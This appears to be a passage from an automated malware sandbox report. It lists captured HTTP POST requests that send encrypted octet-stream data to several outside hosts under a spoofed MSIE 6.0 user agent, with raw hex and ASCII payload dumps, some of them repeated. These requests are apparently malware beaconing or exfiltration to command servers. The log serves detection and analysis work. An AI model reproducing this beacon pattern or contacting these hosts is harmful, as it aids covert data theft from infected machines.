TDCet8jquf95/LLfC4/zOTsFLD1QBTaXfGKpRqFH4SzbBWtjqmf0VX8BzI5hbmDuo+BHPTMV5vaDZ4OfKz2QaOeA6DznrNr2Gfm44xwhoLfBNMYqo8LZD4idfKq4nsmRzR132N+t9XxAJ99v+ysq6uD9jPbgrAM8Cd51XniS9j26h/M9OwnJv/tsyOrr8wxBFxiliBywy0peeCoZXmKxYag0zGBZZN2i1BzHMRtNbEZUWVDN2e1i45pBzGen3BURzeH00VRX+Uk9p17/zINH7A077XO8LnA/akrH4nkJqO7Cztwn6rvkCwMJaN6PghI39lNJgylQ7NswOAFsjrA42yD47w9a8/jwrMN4+tj8gfkxqOx0VduO35fXbK1gJzwJGuO01Cg10PhMjGp1GJPwkEhbnJ8WkrKSdLP7d8uCRmRD9I9UVFsGxZuVa4r9TyIokldlHXMNbCoyL8s3ddkseuByn3rCHHLQIQ4cFneW0WDnn9rfqZwymngrBgrfTcF9Fu5Xy4EUcaN8ctN/6GsuTFjJNICCyEi5Qu/nYH8bJjXZJ8bzQ7103bM/0WBymtMLmxeAWV3m
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 39 59 64 4f 39 64 30 37 78 50 39 6f 76 4b 34 6d 46 41 76 56 51 52 59 59 74 35 69 4c 47 46 39 2b 59 51 4b 59 71 36 53 52 4d 47 34 69 6a 42 64 36 6a 51 57 66 42 31 4d 34 32 6f 6c 66 51 2b 57 7a 57 54 59 44 54 30 61 4a 6e 68 41 72 48 50 74 75 6e 58 77 4e 6b 42 78 6c 39 58 56 47 6e 52 33 2b 53 56 6d 4f 77 74 59 42 76 62 77 6c 2f 76 36 36 43 65 63 75 76 78 44 6d 33 65 54 4f 45 31 37 35 31 6d 61 65 68 68 71 67 6c 31 38 67 57 70 36 45 51 59 7a 73 79 34 72 4a 4b 32 52 70 39 65 43 73 45 34 4f 61 4b 35 62 56 52 53 67 49 34 7a 39 37 43 67 32 33 4f 4a 4b 54 6f 59 46 67 53 36 51 68 67 4e 4b 68 65 68 71 54 5a 48 44 5a 67 2f 56 46 67 4e 4d 43 31 4a 73 4c 37 34 61 35 4b 5a 62 39 6e 78 63 6f 2b 4c 4c 68 69 42 48 61 6f 78 47 72 4b 45 73 37 68 69 2f 52 61 6d 78 38 64 39 35 4b 67 67 35 7a 6a 41 51 78 6b 2f 41 79 79 61 31 4e 6f 39 59 4d 38 52 4b 43 68 61 79 6e 61 5a 51 37 6c 73 4c 46 71 77 74 39 67 6c 6a 36 76 70 61 4f 74 37 2b 48 70 39 6a 59 53 72 39 70 59 74 6a 74 77 44 7a 31 6d 67 79 55 55 5a 71 4b 77 53 4a 38 4f 30 65 4a 76 37 45 79 39 50 59 6b 76 30 54 2b 46 57 5a 5a 52 76 64 6e 43 32 34 47 64 70 35 7a 32 62 2f 71 6e 54 4a 69 47 39 69 48 2b 37 36 79 69 63 71 68 2b 5a 78 68 71 46 71 36 76 33 36 54 67 4d 33 56 4a 70 72 45 75 67 6f 59 52 4e 44 32 31 41 4e 71 70 38 79 61 6c 6d 5a 75 72 59 57 57 4a 43 77 66 46 53 74 45 43 66 4e 35 74 6e 33 56 69 6c 51 77 78 44 31 57 6f 51 51 75 65 33 50 63 47 66 2b 6f 63 54 53 43 47 35 67 63 65 36 57 79 4e 4a 71 78 48 64 31 68 52 45 69 67 68 36 35 50 72 45 48 76 66 6a 6b 33 67 6d 70 52 6e 6b 71 61 38 70 48 48 4b 68 56 6b 38 58 75 77 58 50 65 76 4c 37 65 4f 4f 53 52 75 32 6b 34 79 6e 77 69 59 53 49 50 72 65 71 42 34 72 5a 59 77 Data Ascii: 9YdO9d07xP9ovK4mFAvVQRYYt5iLGF9+YQKYq6SRMG4ijBd6jQWfB1M42olfQ+WzWTYDT0aJnhArHPtunXwNkBxl9XVGnR3+SVmOwtYBvbwl/v66CecuvxDm3eTOE1751maehhqgl18gWp6EQYzsy4rJK2Rp9eCsE4OaK5bVRSgI4z97Cg23OJKToYFgS6QhgNKhehqTZHDZg/VFgNMC1JsL74a5KZb9nxco+LLhiBHaoxGrKEs7hi/Ramx8d95Kgg5zjAQxk/Ayya1No9YM8RKChaynaZQ7lsLFqwt9glj6vpaOt7+Hp9jYSr9pYtjtwDz1mgyUUZqKwSJ8O0eJv7Ey9PYkv0T+FWZZRvdnC24Gdp5z2b/qnTJiG9iH+76yicqh+ZxhqFq6v36TgM3VJprEugoYRND21ANqp8yalmZurYWWJCwfFStECfN5tn3VilQwxD1WoQQue3PcGf+ocTSCG5gce6WyNJqxHd1hREigh65PrEHvfjk3gmpRnkqa8pHHKhVk8XuwXPevL7eOOSRu2k4ynwiYSIPreqB4rZYw
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 72 33 45 65 37 63 33 33 77 2f 38 47 79 51 55 6e 52 44 59 6a 67 59 5a 70 6c 43 77 37 57 2f 38 69 55 51 31 33 73 6d 4e 69 42 4e 4a 6f 55 68 65 46 36 61 48 5a 49 45 7a 68 51 4e 77 30 48 46 6f 78 55 45 4f 78 43 71 37 6a 55 51 6f 72 71 63 65 6b 37 4a 68 32 66 30 48 69 62 49 39 6b 57 6c 67 4a 48 54 6e 6a 2f 36 55 75 58 6a 6c 76 4f 74 59 42 50 47 47 42 4e 39 74 71 42 4e 64 67 34 47 76 68 34 68 4f 43 42 71 6c 43 33 57 42 69 62 6f 74 32 6f 4f 47 7a 42 62 57 76 2b 64 55 34 41 62 32 71 56 33 78 52 42 48 49 58 35 2b 38 61 64 46 32 77 53 76 68 6e 72 68 75 32 55 4d 49 66 4e 31 66 41 34 2b 43 77 65 6c 52 73 49 48 62 53 2b 43 47 74 41 50 4c 5a 4b 66 50 70 49 6e 41 6c 54 70 6d 4c 62 6f 6d 56 71 5a 47 47 6b 45 55 2b 54 4c 5a 46 2b 43 4b 6d 72 66 46 6d 77 6f 44 62 33 56 7a 57 37 4e 69 78 79 62 44 4e 39 47 4d 4e 63 2b 4d 72 43 6c 50 33 67 55 43 33 49 34 66 49 47 57 55 34 4d 52 59 61 50 64 6c 6a 4f 48 59 6a 47 73 69 39 35 58 65 2f 36 35 31 33 63 59 6c 45 35 4f 39 78 32 37 64 61 44 6e 37 6e 47 6f 4b 66 6c 58 6f 47 6e 77 44 63 38 47 45 4a 75 2b 52 35 51 62 6c 5a 43 6b 63 67 56 63 55 4c 36 2b 67 4e 70 6a 63 72 78 37 79 31 54 64 51 2f 6c 6e 36 75 62 31 6f 6f 79 4c 6d 56 78 51 43 4f 77 68 46 67 65 4d 4f 57 4d 4a 7a 7a 56 79 63 72 58 77 61 63 62 54 78 62 4e 6b 2f 58 35 32 55 65 6f 32 49 61 75 52 33 38 67 68 36 71 4d 30 47 6b 65 48 73 36 6b 58 32 34 30 53 45 58 69 76 49 5a 34 56 4c 49 41 54 31 59 31 6b 79 51 6c 59 57 47 76 76 6e 6f 4b 34 58 67 72 41 70 64 31 37 33 53 57 43 4f 2f 4d 78 34 69 69 44 78 6c 30 57 34 58 66 36 67 4f 61 75 43 4a 44 70 50 54 61 49 68 42 55 50 62 50 6d 36 7a 52 63 30 33 6d 58 68 32 55 35 76 34 57 6c 39 6d 62 56 62 4b 2b 78 62 7a 55 59 4f 5a 6c 5a 4b 7a 61 Data Ascii: r3Ee7c33w/8GyQUnRDYjgYZplCw7W/8iUQ13smNiBNJoUheF6aHZIEzhQNw0HFoxUEOxCq7jUQorqcek7Jh2f0HibI9kWlgJHTnj/6UuXjlvOtYBPGGBN9tqBNdg4Gvh4hOCBqlC3WBibot2oOGzBbWv+dU4Ab2qV3xRBHIX5+8adF2wSvhnrhu2UMIfN1fA4+CwelRsIHbS+CGtAPLZKfPpInAlTpmLbomVqZGGkEU+TLZF+CKmrfFmwoDb3VzW7NixybDN9GMNc+MrClP3gUC3I4fIGWU4MRYaPdljOHYjGsi95Xe/6513cYlE5O9x27daDn7nGoKflXoGnwDc8GEJu+R5QblZCkcgVcUL6+gNpjcrx7y1TdQ/ln6ub1ooyLmVxQCOwhFgeMOWMJzzVycrXwacbTxbNk/X52Ueo2IauR38gh6qM0GkeHs6kX240SEXivIZ4VLIAT1Y1kyQlYWGvvnoK4XgrApd173SWCO/Mx4iiDxl0W4Xf6gOauCJDpPTaIhBUPbPm6zRc03mXh2U5v4Wl9mbVbK+xbzUYOZlZKza
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 79 43 4d 46 71 72 6c 35 75 66 38 48 4e 65 6c 68 53 4e 64 71 41 6c 49 43 2b 50 2b 58 59 55 4d 55 2f 5a 64 4f 36 58 50 6e 58 7a 4b 32 47 44 73 79 6f 52 38 68 6e 36 61 2b 70 67 6e 59 54 4f 4c 6e 74 70 71 42 52 46 2f 41 4a 2b 4f 5a 57 4a 51 5a 59 6c 2b 52 4e 65 5a 36 64 4d 30 63 49 35 63 2f 57 57 76 2f 31 73 76 42 78 61 79 7a 61 38 32 42 36 56 75 41 66 78 49 59 31 49 77 57 36 54 58 68 44 7a 66 79 79 79 64 6c 72 42 79 44 36 68 68 32 44 52 68 58 55 49 4d 58 6d 77 32 55 52 39 6f 37 47 30 41 5a 73 44 72 35 6d 4a 58 6c 4d 2f 2b 64 36 50 62 30 34 45 53 37 68 6c 72 55 76 61 34 50 6b 44 31 61 59 4c 44 77 4f 48 79 39 46 36 2f 35 74 33 30 58 6a 48 64 57 75 59 35 55 51 51 71 64 33 45 50 44 7a 52 64 4e 4f 61 41 52 50 2f 54 33 67 43 62 49 65 35 2f 64 78 5a 33 6f 5a 49 6f 63 76 63 56 44 78 2f 4d 4f 74 6d 44 4e 66 4a 62 47 6c 4a 30 38 73 6a 4a 51 47 37 5a 6b 2b 6a 77 30 70 59 43 6f 36 49 35 72 6e 6a 6a 34 67 58 36 31 53 68 41 47 47 37 77 74 74 6e 48 44 41 51 69 34 66 6f 33 4c 7a 4c 4d 63 37 76 61 31 63 4e 66 6e 48 63 37 70 47 50 54 37 6e 54 59 39 36 37 2f 42 64 61 47 61 2b 4f 65 6d 58 71 78 75 6e 6d 66 2f 71 53 66 67 70 36 36 57 62 45 6c 6e 62 34 76 67 2f 6d 6c 2b 7a 2b 64 34 5a 55 79 74 68 5a 79 38 32 63 6d 39 7a 35 6a 4c 49 39 4e 63 79 6f 4c 5a 74 36 74 59 59 43 58 41 6a 48 51 6c 44 6d 50 43 69 51 51 6a 73 6e 56 67 4d 66 61 67 41 42 69 51 5a 74 59 75 47 4d 4c 52 51 67 6b 46 38 71 33 62 46 52 42 53 62 51 6a 4b 73 45 39 72 57 45 69 6b 70 47 61 57 30 59 6d 5a 4c 7a 70 57 45 64 36 38 55 70 46 61 43 48 4a 4d 35 5a 65 55 4d 4d 53 75 39 71 52 35 4a 68 79 74 4a 61 56 2f 46 65 4c 30 30 62 77 6d 71 36 52 4f 6d 70 5a 32 71 30 39 6c 44 54 4a 63 4e 56 45 45 37 4b 5a 67 63 30 62 31 61 34 32 44 4d 4c 4f 4a 63 70 79 77 73 4d 46 77 65 6d 53 35 35 67 3d 3d Data Ascii: yCMFqrl5uf8HNelhSNdqAlIC+P+XYUMU/ZdO6XPnXzK2GDsyoR8hn6a+pgnYTOLntpqBRF/AJ+OZWJQZYl+RNeZ6dM0cI5c/WWv/1svBxayza82B6VuAfxIY1IwW6TXhDzfyyydlrByD6hh2DRhXUIMXmw2UR9o7G0AZsDr5mJXlM/+d6Pb04ES7hlrUva4PkD1aYLDwOHy9F6/5t30XjHdWuY5UQQqd3EPDzRdNOaARP/T3gCbIe5/dxZ3oZIocvcVDx/MOtmDNfJbGlJ08sjJQG7Zk+jw0pYCo6I5rnjj4gX61ShAGG7wttnHDAQi4fo3LzLMc7va1cNfnHc7pGPT7nTY967/BdaGa+OemXqxunmf/qSfgp66WbElnb4vg/ml+z+d4ZUythZy82cm9z5jLI9NcyoLZt6tYYCXAjHQlDmPCiQQjsnVgMfagABiQZtYuGMLRQgkF8q3bFRBSbQjKsE9rWEikpGaW0YmZLzpWEd68UpFaCHJM5ZeUMMSu9qR5JhytJaV/FeL00bwmq6ROmpZ2q09lDTJcNVEE7KZgc0b1a42DMLOJcpywsMFwemS55g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 67 62 2b 45 77 4d 59 30 75 76 2b 64 53 46 33 77 34 59 56 41 6b 65 6b 6c 68 46 6b 6d 41 72 4e 56 57 6b 57 6c 63 4e 78 71 52 2b 51 78 44 69 48 48 67 48 53 35 50 71 53 70 59 2b 62 7a 43 6c 57 74 6f 33 74 75 61 43 67 67 33 2b 51 2b 63 78 33 36 64 56 57 6f 4b 73 53 6d 70 65 5a 79 57 50 4b 44 66 2f 7a 67 33 4d 78 72 62 75 58 73 49 75 63 39 55 45 53 73 42 47 64 36 64 4c 4c 56 37 35 4b 31 36 72 42 55 5a 63 30 46 79 76 56 44 75 67 52 33 7a 6b 54 78 34 5a 35 55 61 2b 61 78 53 7a 71 6d 59 4a 5a 34 37 54 77 35 38 41 7a 4a 43 68 36 49 6c 31 72 61 7a 37 77 73 68 50 78 64 4c 2f 6a 46 55 69 4c 77 56 75 6a 6b 50 6f 49 6c 48 5a 49 50 52 38 65 58 45 67 4d 72 51 6c 57 35 48 6d 37 61 4c 6a 55 79 37 68 65 44 73 4a 69 63 54 78 31 54 5a 4b 74 72 73 43 4c 54 76 4e 73 70 35 72 54 4c 68 47 59 62 56 57 6a 36 6a 66 43 4c 77 35 62 35 4b 36 32 69 32 59 57 58 35 76 53 73 73 49 39 45 69 62 4e 39 71 6f 6a 31 6a 78 55 4d 72 6c 6c 78 79 33 54 44 71 44 39 52 6b 41 73 54 4f 56 6c 72 70 39 36 59 6d 2f 46 65 72 36 2b 57 42 39 70 57 6a 2b 6b 71 44 50 66 38 39 74 35 6a 37 35 34 67 49 46 61 6e 46 37 71 5a 2b 52 64 52 48 34 47 51 36 4d 35 39 2f 61 50 64 6a 63 47 4d 57 34 41 55 2f 67 54 59 6e 5a 76 41 46 65 61 37 4f 58 32 2f 39 5a 67 59 34 65 6f 46 2b 58 70 45 50 75 4d 37 70 7a 47 6c 44 30 43 4c 6d 5a 6d 5a 4d 36 39 50 37 56 56 45 55 5a 44 54 67 4a 68 52 53 38 56 55 4a 51 79 31 2f 2b 48 6a 68 7a 6e 6e 57 74 69 55 5a 2b 36 45 75 35 4a 6d 42 6f 4b 48 69 4e 68 57 64 37 37 74 31 36 73 72 4b 35 6e 6b 4b 72 4a 76 6f 49 73 61 6a 71 57 75 79 43 36 65 33 5a 67 56 65 56 6a 4e 47 35 52 6e 6f 34 67 43 78 37 4a 7a 74 30 38 6b 36 57 62 36 41 32 72 61 6a 50 2f 73 4c 68 6c 37 7a 4b 57 73 66 6b 30 77 6c 73 75 63 31 48 45 3d Data Ascii: gb+EwMY0uv+dSF3w4YVAkeklhFkmArNVWkWlcNxqR+QxDiHHgHS5PqSpY+bzClWto3tuaCgg3+Q+cx36dVWoKsSmpeZyWPKDf/zg3MxrbuXsIuc9UESsBGd6dLLV75K16rBUZc0FyvVDugR3zkTx4Z5Ua+axSzqmYJZ47Tw58AzJCh6Il1raz7wshPxdL/jFUiLwVujkPoIlHZIPR8eXEgMrQlW5Hm7aLjUy7heDsJicTx1TZKtrsCLTvNsp5rTLhGYbVWj6jfCLw5b5K62i2YWX5vSssI9EibN9qoj1jxUMrllxy3TDqD9RkAsTOVlrp96Ym/Fer6+WB9pWj+kqDPf89t5j754gIFanF7qZ+RdRH4GQ6M59/aPdjcGMW4AU/gTYnZvAFea7OX2/9ZgY4eoF+XpEPuM7pzGlD0CLmZmZM69P7VVEUZDTgJhRS8VUJQy1/+HjhznnWtiUZ+6Eu5JmBoKHiNhWd77t16srK5nkKrJvoIsajqWuyC6e3ZgVeVjNG5Rno4gCx7Jzt08k6Wb6A2rajP/sLhl7zKWsfk0wlsuc1HE=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 79 43 4d 46 71 72 6c 35 75 66 38 48 4e 65 6c 68 53 4e 64 71 41 6c 49 43 2b 50 2b 58 59 55 4d 55 2f 5a 64 4f 36 58 50 6e 58 7a 4b 32 47 44 73 79 6f 52 38 68 6e 36 61 2b 70 67 6e 59 54 4f 4c 6e 74 70 71 42 52 46 2f 41 4a 2b 4f 5a 57 4a 51 5a 59 6c 2b 52 4e 65 5a 36 64 4d 30 63 49 35 63 2f 57 57 76 2f 31 73 76 42 78 61 79 7a 61 38 32 42 36 56 75 41 66 78 49 59 31 49 77 57 36 54 58 68 44 7a 66 79 79 79 64 6c 72 42 79 44 36 68 68 32 44 52 68 58 55 49 4d 58 6d 77 32 55 52 39 6f 37 47 30 41 5a 73 44 72 35 6d 4a 58 6c 4d 2f 2b 64 36 50 62 30 34 45 53 37 68 6c 72 55 76 61 34 50 6b 44 31 61 59 4c 44 77 4f 48 79 39 46 36 2f 35 74 33 30 58 6a 48 64 57 75 59 35 55 51 51 71 64 33 45 50 44 7a 52 64 4e 4f 61 41 52 50 2f 54 33 67 43 62 49 65 35 2f 64 78 5a 33 6f 5a 49 6f 63 76 63 56 44 78 2f 4d 4f 74 6d 44 4e 66 4a 62 47 6c 4a 30 38 73 6a 4a 51 47 37 5a 6b 2b 6a 77 30 70 59 43 6f 36 49 35 72 6e 6a 6a 34 67 58 36 31 53 68 41 47 47 37 77 74 74 6e 48 44 41 51 69 34 66 6f 33 4c 7a 4c 4d 63 37 76 61 31 63 4e 66 6e 48 63 37 70 47 50 54 37 6e 54 59 39 36 37 2f 42 64 61 47 61 2b 4f 65 6d 58 71 78 75 6e 6d 66 2f 71 53 66 67 70 36 36 57 62 45 6c 6e 62 34 76 67 2f 6d 6c 2b 7a 2b 64 34 5a 55 79 74 68 5a 79 38 32 63 6d 39 7a 35 6a 4c 49 39 4e 63 79 6f 4c 5a 74 36 74 59 59 43 58 41 6a 48 51 6c 44 6d 50 43 69 51 51 6a 73 6e 56 67 4d 66 61 67 41 42 69 51 5a 74 59 75 47 4d 4c 52 51 67 6b 46 38 71 33 62 46 52 42 53 62 51 6a 4b 73 45 39 72 57 45 69 6b 70 47 61 57 30 59 6d 5a 4c 7a 70 57 45 64 36 38 55 70 46 61 43 48 4a 4d 35 5a 65 55 4d 4d 53 75 39 71 52 35 4a 68 79 74 4a 61 56 2f 46 65 4c 30 30 62 77 6d 71 36 52 4f 6d 70 5a 32 71 30 39 6c 44 54 4a 63 4e 56 45 45 37 4b 5a 67 63 30 62 31 61 34 32 44 4d 4c 4f 4a 63 70 79 77 73 4d 46 77 65 6d 53 35 35 67 3d 3d Data Ascii: yCMFqrl5uf8HNelhSNdqAlIC+P+XYUMU/ZdO6XPnXzK2GDsyoR8hn6a+pgnYTOLntpqBRF/AJ+OZWJQZYl+RNeZ6dM0cI5c/WWv/1svBxayza82B6VuAfxIY1IwW6TXhDzfyyydlrByD6hh2DRhXUIMXmw2UR9o7G0AZsDr5mJXlM/+d6Pb04ES7hlrUva4PkD1aYLDwOHy9F6/5t30XjHdWuY5UQQqd3EPDzRdNOaARP/T3gCbIe5/dxZ3oZIocvcVDx/MOtmDNfJbGlJ08sjJQG7Zk+jw0pYCo6I5rnjj4gX61ShAGG7wttnHDAQi4fo3LzLMc7va1cNfnHc7pGPT7nTY967/BdaGa+OemXqxunmf/qSfgp66WbElnb4vg/ml+z+d4ZUythZy82cm9z5jLI9NcyoLZt6tYYCXAjHQlDmPCiQQjsnVgMfagABiQZtYuGMLRQgkF8q3bFRBSbQjKsE9rWEikpGaW0YmZLzpWEd68UpFaCHJM5ZeUMMSu9qR5JhytJaV/FeL00bwmq6ROmpZ2q09lDTJcNVEE7KZgc0b1a42DMLOJcpywsMFwemS55g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 66 6e 47 4c 45 64 4e 32 7a 66 2f 75 36 44 30 30 6d 67 37 52 73 58 78 73 7a 2b 2b 35 4e 54 4c 61 74 36 46 4e 69 52 4d 68 76 4b 63 39 4d 48 47 4e 59 34 56 75 69 52 46 4e 72 55 47 53 79 64 31 35 42 71 63 47 52 4a 32 50 37 37 32 4c 65 52 69 53 69 63 6c 6a 67 6c 67 50 4c 6e 4c 71 5a 79 4c 77 71 77 71 77 4b 77 78 56 7a 79 58 35 34 71 42 71 4f 54 79 76 6d 65 71 59 67 6d 67 66 77 73 68 58 64 43 67 6f 53 72 61 59 30 41 43 6d 43 39 77 2b 74 45 6b 54 57 58 4b 79 76 32 4c 72 74 68 72 4b 6a 52 37 58 47 41 39 38 58 51 54 4b 62 5a 43 47 44 5a 54 53 43 77 77 31 65 42 72 6d 6d 61 43 57 30 46 5a 33 71 7a 41 4c 45 43 6e 42 59 52 33 41 4c 74 34 50 73 70 76 2b 34 36 63 77 37 4c 69 30 45 48 2f 37 5a 5a 49 35 46 4e 54 37 5a 73 50 33 64 4a 73 35 78 54 42 56 7a 31 58 59 50 2f 49 59 32 7a 39 38 56 38 70 37 65 45 6f 45 32 37 78 4e 73 79 46 64 62 69 36 6c 59 39 38 35 30 42 31 42 58 30 72 32 55 52 61 71 68 37 54 75 66 6a 67 2f 62 33 53 4a 4a 65 49 6d 41 2b 65 48 79 71 37 79 6a 30 71 52 57 67 64 68 72 53 4c 76 4a 47 37 78 65 74 46 33 36 58 63 59 62 68 4c 54 47 56 55 43 45 54 58 6c 59 76 36 4a 63 49 79 6b 79 63 61 63 35 63 52 62 2f 39 30 56 56 2b 50 30 59 5a 57 4b 30 7a 34 65 4d 39 6c 53 66 47 70 6c 4b 2b 6a 79 64 43 65 68 67 6d 4a 6c 52 65 6f 47 31 65 6d 57 67 42 43 79 33 4b 54 4a 33 4d 53 79 31 59 42 4e 34 2b 6a 52 32 47 6b 2f 74 66 6e 44 6b 78 66 38 6d 67 63 6b 2f 70 4c 62 4b 47 73 30 58 2f 39 4e 6a 65 51 50 4e 39 78 51 5a 31 50 44 77 61 57 59 7a 38 6b 32 33 6a 62 6d 70 72 65 72 69 2b 71 39 56 72 57 6c 56 4d 31 55 55 66 46 6b 67 62 7a 4c 64 58 38 72 7a 57 57 30 44 52 6a 42 6b 71 5a 4e 47 71 32 6f 72 59 62 64 64 32 78 71 30 6c 6d 42 55 77 4f 41 53 39 59 63 39 76 33 65 Data Ascii: fnGLEdN2zf/u6D00mg7RsXxsz++5NTLat6FNiRMhvKc9MHGNY4VuiRFNrUGSyd15BqcGRJ2P772LeRiSicljglgPLnLqZyLwqwqwKwxVzyX54qBqOTyvmeqYgmgfwshXdCgoSraY0ACmC9w+tEkTWXKyv2LrthrKjR7XGA98XQTKbZCGDZTSCww1eBrmmaCW0FZ3qzALECnBYR3ALt4Pspv+46cw7Li0EH/7ZZI5FNT7ZsP3dJs5xTBVz1XYP/IY2z98V8p7eEoE27xNsyFdbi6lY9850B1BX0r2URaqh7Tufjg/b3SJJeImA+eHyq7yj0qRWgdhrSLvJG7xetF36XcYbhLTGVUCETXlYv6JcIykycac5cRb/90VV+P0YZWK0z4eM9lSfGplK+jydCehgmJlReoG1emWgBCy3KTJ3MSy1YBN4+jR2Gk/tfnDkxf8mgck/pLbKGs0X/9NjeQPN9xQZ1PDwaWYz8k23jbmpreri+q9VrWlVM1UUfFkgbzLdX8rzWW0DRjBkqZNGq2orYbdd2xq0lmBUwOAS9Yc9v3e
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 6a 65 6c 31 45 52 39 32 7a 66 2f 64 66 6d 46 63 66 6b 7a 31 6e 36 68 46 4c 70 7a 31 68 4e 61 61 77 35 65 57 33 32 32 53 41 53 30 36 55 54 63 41 53 2b 72 54 52 73 71 66 34 51 78 38 6e 6c 4e 5a 37 4a 65 45 7a 73 30 30 49 68 57 74 6a 63 2b 47 46 77 59 64 4d 71 5a 51 31 63 45 65 54 62 4d 76 4e 6c 76 4a 54 41 35 75 74 50 42 79 41 71 7a 4d 54 45 6a 49 71 4b 30 55 4a 4d 35 41 70 66 32 50 4a 2b 73 4c 48 43 66 66 7a 33 75 45 34 6d 34 33 4f 41 68 6b 33 72 5a 78 6b 68 49 77 69 6f 36 79 59 63 78 36 74 33 61 6b 42 77 77 75 63 59 36 71 6b 72 36 4c 61 42 44 51 69 52 38 70 6c 37 72 35 66 6f 32 51 4c 57 38 71 61 4d 66 66 66 54 56 79 77 70 69 77 54 61 65 50 7a 32 49 50 77 67 6a 72 42 75 53 6e 6e 49 51 53 33 63 42 2f 56 7a 58 4d 56 62 6b 71 5a 6f 45 50 35 2b 6d 65 44 59 52 49 31 75 56 48 39 56 35 48 59 4a 43 34 6a 77 30 48 48 5a 50 67 4b 65 70 4b 4a 2b 6d 46 7a 34 33 64 77 5a 61 59 71 4e 58 77 6f 78 5a 77 72 36 58 56 74 6f 2b 37 59 32 52 2f 59 78 4e 30 67 42 33 53 63 43 4d 37 6c 72 66 77 54 62 54 67 56 5a 77 4c 42 63 39 6b 56 59 55 6d 46 62 64 4e 63 56 4d 4f 35 2b 69 56 73 73 79 64 79 4d 70 41 6e 32 72 68 4c 6e 58 69 68 45 37 56 68 55 63 59 45 70 69 36 66 46 6e 67 7a 71 79 31 47 4e 6c 54 31 4f 6c 6e 4a 4b 6d 67 35 55 4d 6f 58 43 53 64 69 6c 67 70 34 68 6d 47 5a 39 6e 6e 6e 57 74 58 4e 32 39 51 69 79 54 61 44 34 46 4e 4d 64 37 53 61 4b 4c 2f 71 5a 73 7a 6d 58 6f 4a 65 54 55 79 4a 49 38 6f 56 4a 51 30 65 73 69 33 62 74 2b 69 30 44 49 68 71 37 32 47 45 52 50 5a 58 63 61 4b 36 69 75 6d 6a 36 52 6f 53 57 78 57 67 78 58 4c 4f 42 53 43 79 61 58 45 79 4e 37 30 53 58 6d 64 42 42 6c 63 4a 6c 53 73 4a 52 37 46 68 57 77 4d 5a 56 59 46 6a 55 69 45 52 51 3d 3d Data Ascii: jel1ER92zf/dfmFcfkz1n6hFLpz1hNaaw5eW322SAS06UTcAS+rTRsqf4Qx8nlNZ7JeEzs00IhWtjc+GFwYdMqZQ1cEeTbMvNlvJTA5utPByAqzMTEjIqK0UJM5Apf2PJ+sLHCffz3uE4m43OAhk3rZxkhIwio6yYcx6t3akBwwucY6qkr6LaBDQiR8pl7r5fo2QLW8qaMfffTVywpiwTaePz2IPwgjrBuSnnIQS3cB/VzXMVbkqZoEP5+meDYRI1uVH9V5HYJC4jw0HHZPgKepKJ+mFz43dwZaYqNXwoxZwr6XVto+7Y2R/YxN0gB3ScCM7lrfwTbTgVZwLBc9kVYUmFbdNcVMO5+iVssydyMpAn2rhLnXihE7VhUcYEpi6fFngzqy1GNlT1OlnJKmg5UMoXCSdilgp4hmGZ9nnnWtXN29QiyTaD4FNMd7SaKL/qZszmXoJeTUyJI8oVJQ0esi3bt+i0DIhq72GERPZXcaK6iumj6RoSWxWgxXLOBSCyaXEyN70SXmdBBlcJlSsJR7FhWwMZVYFjUiERQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 67 62 2b 45 77 4d 59 30 75 76 2b 64 53 46 33 77 34 59 56 41 6b 65 6b 6c 68 46 6b 6d 41 72 4e 56 57 6b 57 6c 63 4e 78 71 52 2b 51 78 44 69 48 48 67 48 53 35 50 71 53 70 59 2b 62 7a 43 6c 57 74 6f 33 74 75 61 43 67 67 33 2b 51 2b 63 78 33 36 64 56 57 6f 4b 73 53 6d 70 65 5a 79 57 50 4b 44 66 2f 7a 67 33 4d 78 72 62 75 58 73 49 75 63 39 55 45 53 73 42 47 64 36 64 4c 4c 56 37 35 4b 31 36 72 42 55 5a 63 30 46 79 76 56 44 75 67 52 33 7a 6b 54 78 34 5a 35 55 61 2b 61 78 53 7a 71 6d 59 4a 5a 34 37 54 77 35 38 41 7a 4a 43 68 36 49 6c 31 72 61 7a 37 77 73 68 50 78 64 4c 2f 6a 46 55 69 4c 77 56 75 6a 6b 50 6f 49 6c 48 5a 49 50 52 38 65 58 45 67 4d 72 51 6c 57 35 48 6d 37 61 4c 6a 55 79 37 68 65 44 73 4a 69 63 54 78 31 54 5a 4b 74 72 73 43 4c 54 76 4e 73 70 35 72 54 4c 68 47 59 